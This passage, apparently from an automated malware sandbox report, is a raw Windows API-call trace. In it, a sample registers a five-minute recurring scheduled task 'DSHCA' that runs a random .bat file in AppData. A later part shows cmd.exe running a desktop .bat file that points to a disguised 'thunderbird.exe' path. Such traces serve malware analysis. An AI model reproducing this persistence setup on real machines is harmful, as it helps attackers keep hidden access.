wReserved2=0x9f7d, wReserved3=0xdb8e, varVal1=0x2deec8, varVal2=0x2de2d8), domain=0x2dd37c*(varType=0x0, wReserved1=0xd3a2, wReserved2=0xe2a0, wReserved3=0x2d, varVal1=0x7c994e, varVal2=0x9d6a50), password=0x2dd38c*(varType=0x0, wReserved1=0x77ca, wReserved2=0x3c, wReserved3=0x0, varVal1=0x2e53f000, varVal2=0xffffffac)) returned 0x0 [0179.686] TaskScheduler:IUnknown:AddRef (This=0x493e68) returned 0x2 [0179.686] TaskScheduler:ITaskService:GetFolder (in: This=0x493e68, Path=0x0, ppFolder=0x2dd490 | out: ppFolder=0x2dd490*=0x493ed0) returned 0x0 [0179.690] TaskScheduler:ITaskService:NewTask (in: This=0x493e68, flags=0x0, ppDefinition=0x2dd4a0 | out: ppDefinition=0x2dd4a0*=0x493f00) returned 0x0 [0182.004] ITaskDefinition:get_Actions (in: This=0x493f00, ppActions=0x2dd3ec | out: ppActions=0x2dd3ec*=0x493f78) returned 0x0 [0182.004] IActionCollection:Create (in: This=0x493f78, Type=0, ppAction=0x2dd404 | out: ppAction=0x2dd404*=0x492908) returned 0x0 [0182.914] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0182.914] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0182.914] lstrlenW (lpString=" ") returned 1 [0182.914] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0182.914] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0182.914] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x55) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x73) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x35) returned 0x0 [0182.915] StrChrW (lpStart=" ", wMatch=0x4e) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x72) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x47) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x4a) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x30) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x6a) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x53) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x20) returned=" " [0182.916] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0182.916] StrChrW (lpStart=" ", wMatch=0x4c) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x7a) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0182.917] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x67) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x66) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x4d) returned 0x0 [0182.918] StrChrW (lpStart=" ", wMatch=0x58) returned 0x0 [0182.919] StrChrW (lpStart=" ", wMatch=0x6a) returned 0x0 [0182.919] StrChrW (lpStart=" ", wMatch=0x34) returned 0x0 [0182.919] StrChrW (lpStart=" ", wMatch=0x77) returned 0x0 [0182.919] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0182.919] StrChrW (lpStart=" ", wMatch=0x4c) returned 0x0 [0182.919] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0182.919] StrChrW (lpStart=" ", wMatch=0x62) returned 0x0 [0182.919] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0182.919] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0182.919] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 58 [0182.919] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat", wMatch=0x20) returned=" HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat" [0182.919] lstrlenW (lpString="HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat") returned 37 [0182.920] lstrlenW (lpString=" ") returned 1 [0182.920] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x48) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x4c) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x63) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x78) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x7a) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0182.920] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x70) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x44) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x6f) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x6d) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x69) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x6e) returned 0x0 [0182.921] StrChrW (lpStart=" ", wMatch=0x67) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x66) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x4d) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x58) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x6a) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x34) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x77) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x65) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x4c) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0182.922] StrChrW (lpStart=" ", wMatch=0x62) returned 0x0 [0182.923] StrChrW (lpStart=" ", wMatch=0x61) returned 0x0 [0182.923] StrChrW (lpStart=" ", wMatch=0x74) returned 0x0 [0182.923] IUnknown:Release (This=0x492908) returned 0x1 [0182.923] IUnknown:Release (This=0x493f78) returned 0x1 [0182.995] ITaskDefinition:get_Triggers (in: This=0x493f00, ppTriggers=0x2dcfd8 | out: ppTriggers=0x2dcfd8*=0x492788) returned 0x0 [0182.995] ITriggerCollection:Create (in: This=0x492788, Type=1, ppTrigger=0x2dcfe4 | out: ppTrigger=0x2dcfe4*=0x492948) returned 0x0 [0182.996] lstrlenW (lpString="5") returned 1 [0182.996] _vsnwprintf (in: _Buffer=0x2dcf78, _BufferCount=0xf, _Format="PT%sM", _ArgList=0x2dcf6c | out: _Buffer="PT5M") returned 4 [0182.996] ITrigger:get_Repetition (in: This=0x492948, ppRepeat=0x2dcfe8 | out: ppRepeat=0x2dcfe8*=0x492998) returned 0x0 [0182.996] IRepetitionPattern:put_Interval (This=0x492998, Interval="PT5M") returned 0x0 [0182.996] IUnknown:Release (This=0x492998) returned 0x1 [0182.996] _vsnwprintf (in: _Buffer=0x2dcf48, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0x2dcf30 | out: _Buffer="2020-09-04T16:46:00") returned 19 [0182.996] ITrigger:put_StartBoundary (This=0x492948, StartBoundary="2020-09-04T16:46:00") returned 0x0 [0182.996] lstrlenW (lpString="") returned 0 [0182.996] lstrlenW (lpString="") returned 0 [0182.997] lstrlenW (lpString="") returned 0 [0182.997] lstrlenW (lpString="") returned 0 [0182.997] IUnknown:Release (This=0x492948) returned 0x1 [0182.997] IUnknown:Release (This=0x492788) returned 0x1 [0182.997] ITaskDefinition:get_Settings (in: This=0x493f00, ppSettings=0x2dd3f4 | out: ppSettings=0x2dd3f4*=0x4927c8) returned 0x0 [0182.998] lstrlenW (lpString="") returned 0 [0182.998] IUnknown:Release (This=0x4927c8) returned 0x1 [0182.998] GetLocalTime (in: lpSystemTime=0x2dd2e4 | out: lpSystemTime=0x2dd2e4*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x10, wMinute=0x2e, wSecond=0x2a, wMilliseconds=0x368)) [0182.998] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0182.998] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0182.998] GetUserNameW (in: lpBuffer=0x2dd2f8, pcbBuffer=0x2dd2e0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2dd2e0) returned 1 [0183.000] ITaskDefinition:get_RegistrationInfo (in: This=0x493f00, ppRegistrationInfo=0x2dd2f4 | out: ppRegistrationInfo=0x2dd2f4*=0x492718) returned 0x0 [0183.000] IRegistrationInfo:put_Author (This=0x492718, Author="5p5NrGJn0jS HALPmcxz") returned 0x0 [0183.000] _vsnwprintf (in: _Buffer=0x2dd2f8, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0x2dd2b8 | out: _Buffer="2020-09-04T16:46:42") returned 19 [0183.000] IRegistrationInfo:put_Date (This=0x492718, Date="2020-09-04T16:46:42") returned 0x0 [0183.000] IUnknown:Release (This=0x492718) returned 0x1 [0183.001] malloc (_Size=0xc) returned 0x4929d0 [0183.001] free (_Block=0x4929d0) [0183.001] lstrlenW (lpString="") returned 0 [0183.001] ITaskDefinition:get_Principal (in: This=0x493f00, ppPrincipal=0x2dd498 | out: ppPrincipal=0x2dd498*=0x4928a8) returned 0x0 [0183.002] IPrincipal:put_RunLevel (This=0x4928a8, RunLevel=1) returned 0x0 [0183.002] IUnknown:Release (This=0x4928a8) returned 0x1 [0183.002] malloc (_Size=0xc) returned 0x4929d0 [0183.002] ITaskFolder:RegisterTaskDefinition (in: This=0x493ed0, Path="DSHCA", pDefinition=0x493f00, flags=6, UserId=0x2dd3dc*(varType=0x0, wReserved1=0x0, wReserved2=0x4150, wReserved3=0x5352, varVal1=0x325245, varVal2=0x1), password=0x2dd3ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0x2dd400*(varType=0x0, wReserved1=0x0, wReserved2=0xd088, wReserved3=0x2d, varVal1=0x0, varVal2=0x0), ppTask=0x2dd48c | out: ppTask=0x2dd48c*=0x492a00) returned 0x0 [0197.511] free (_Block=0x4929d0) [0197.512] _memicmp (_Buf1=0x9d4db0, _Buf2=0x7c1ed8, _Size=0x7) returned 0 [0197.512] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x9d6810, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0197.512] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0197.512] GetProcessHeap () returned 0x9c0000 [0197.512] GetProcessHeap () returned 0x9c0000 [0197.512] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d4ed0) returned 1 [0197.512] GetProcessHeap () returned 0x9c0000 [0197.512] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d4ed0) returned 0xc [0197.513] _vsnwprintf (in: _Buffer=0x2dd8a4, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x2dd410 | out: _Buffer="SUCCESS: The scheduled task \"DSHCA\" has successfully been created.\n") returned 67 [0197.513] _fileno (_File=0x77032920) returned 1 [0197.513] _errno () returned 0x4907d8 [0197.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.513] _errno () returned 0x4907d8 [0197.513] GetFileType (hFile=0x7) returned 0x2 [0197.513] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0197.513] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2dd3d4 | out: lpMode=0x2dd3d4) returned 1 [0197.514] __iob_func () returned 0x77032900 [0197.514] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0197.514] lstrlenW (lpString="SUCCESS: The scheduled task \"DSHCA\" has successfully been created.\n") returned 67 [0197.514] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2dd8a4*, nNumberOfCharsToWrite=0x43, lpNumberOfCharsWritten=0x2dd3fc, lpReserved=0x0 | out: lpBuffer=0x2dd8a4*, lpNumberOfCharsWritten=0x2dd3fc*=0x43) returned 1 [0197.515] IUnknown:Release (This=0x492a00) returned 0x0 [0197.515] TaskScheduler:IUnknown:Release (This=0x493f00) returned 0x0 [0197.515] TaskScheduler:IUnknown:Release (This=0x493ed0) returned 0x0 [0197.515] TaskScheduler:IUnknown:Release (This=0x493e68) returned 0x1 [0197.515] lstrlenW (lpString="") returned 0 [0197.515] lstrlenW (lpString="5") returned 1 [0197.515] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="5", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0197.515] GetProcessHeap () returned 0x9c0000 [0197.515] GetProcessHeap () returned 0x9c0000 [0197.515] HeapValidate (hHeap=0x9c0000, dwFlags=0x0, lpMem=0x9d6b30) returned 1 [0197.515] GetProcessHeap () returned 0x9c0000 [0197.516] RtlSizeHeap (HeapHandle=0x9c0000, Flags=0x0, MemoryPointer=0x9d6b30) returned 0x1fc [0197.516] exit (_Code=0) Thread: id = 692 os_tid = 0x6c8 Process: id = "163" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x308fd000" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 680 os_tid = 0x7c4 [0176.765] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe34 | out: lpSystemTimeAsFileTime=0x26fe34*(dwLowDateTime=0x22ccfe80, dwHighDateTime=0x1d68287)) [0176.765] GetCurrentProcessId () returned 0xa18 [0176.765] GetCurrentThreadId () returned 0x7c4 [0176.765] GetTickCount () returned 0x1158dde [0176.765] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe2c | out: lpPerformanceCount=0x26fe2c*=29710381432) returned 1 [0176.773] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0176.773] __set_app_type (_Type=0x1) [0176.773] __p__fmode () returned 0x770331f4 [0176.774] __p__commode () returned 0x770331fc [0176.774] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0176.774] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0176.774] GetCurrentThreadId () returned 0x7c4 [0176.774] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7c4) returned 0x60 [0176.775] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0176.775] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0176.775] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.127] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0178.128] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fdc4 | out: phkResult=0x26fdc4*=0x0) returned 0x2 [0178.128] VirtualQuery (in: lpAddress=0x26fdfb, lpBuffer=0x26fd94, dwLength=0x1c | out: lpBuffer=0x26fd94*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.128] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fd94, dwLength=0x1c | out: lpBuffer=0x26fd94*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0178.128] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fd94, dwLength=0x1c | out: lpBuffer=0x26fd94*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0178.128] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fd94, dwLength=0x1c | out: lpBuffer=0x26fd94*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0178.128] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fd94, dwLength=0x1c | out: lpBuffer=0x26fd94*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0178.128] GetConsoleOutputCP () returned 0x1b5 [0178.128] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0178.128] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0178.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.128] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0178.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.129] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0178.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0178.129] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0178.130] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.130] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0178.130] _get_osfhandle (_FileHandle=0) returned 0x3 [0178.130] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0178.130] GetEnvironmentStringsW () returned 0x5a2108* [0178.130] GetProcessHeap () returned 0x590000 [0178.130] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a2be0 [0178.131] FreeEnvironmentStringsW (penv=0x5a2108) returned 1 [0178.131] GetProcessHeap () returned 0x590000 [0178.131] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x5a18a8 [0178.131] GetEnvironmentStringsW () returned 0x5a2108* [0178.131] GetProcessHeap () returned 0x590000 [0178.131] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a36b8 [0178.131] FreeEnvironmentStringsW (penv=0x5a2108) returned 1 [0178.131] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed34 | out: phkResult=0x26ed34*=0x68) returned 0x0 [0178.131] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x0, lpData=0x26ed40*=0x0, lpcbData=0x26ed38*=0x1000) returned 0x2 [0178.131] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x4, lpData=0x26ed40*=0x1, lpcbData=0x26ed38*=0x4) returned 0x0 [0178.131] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x0, lpData=0x26ed40*=0x1, lpcbData=0x26ed38*=0x1000) returned 0x2 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x4, lpData=0x26ed40*=0x0, lpcbData=0x26ed38*=0x4) returned 0x0 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x4, lpData=0x26ed40*=0x40, lpcbData=0x26ed38*=0x4) returned 0x0 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x4, lpData=0x26ed40*=0x40, lpcbData=0x26ed38*=0x4) returned 0x0 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x0, lpData=0x26ed40*=0x40, lpcbData=0x26ed38*=0x1000) returned 0x2 [0178.132] RegCloseKey (hKey=0x68) returned 0x0 [0178.132] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ed34 | out: phkResult=0x26ed34*=0x68) returned 0x0 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x0, lpData=0x26ed40*=0x40, lpcbData=0x26ed38*=0x1000) returned 0x2 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x4, lpData=0x26ed40*=0x1, lpcbData=0x26ed38*=0x4) returned 0x0 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x0, lpData=0x26ed40*=0x1, lpcbData=0x26ed38*=0x1000) returned 0x2 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x4, lpData=0x26ed40*=0x0, lpcbData=0x26ed38*=0x4) returned 0x0 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x4, lpData=0x26ed40*=0x9, lpcbData=0x26ed38*=0x4) returned 0x0 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x4, lpData=0x26ed40*=0x9, lpcbData=0x26ed38*=0x4) returned 0x0 [0178.132] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ed3c, lpData=0x26ed40, lpcbData=0x26ed38*=0x1000 | out: lpType=0x26ed3c*=0x0, lpData=0x26ed40*=0x9, lpcbData=0x26ed38*=0x1000) returned 0x2 [0178.132] RegCloseKey (hKey=0x68) returned 0x0 [0178.132] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2ce [0178.132] srand (_Seed=0x5f51e2ce) [0178.132] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\"\"" [0178.132] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\"\"" [0178.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0178.134] GetProcessHeap () returned 0x590000 [0178.134] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a2108 [0178.134] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a2110, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0178.135] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.135] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.135] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.135] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0178.135] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0178.135] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0178.135] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0178.135] 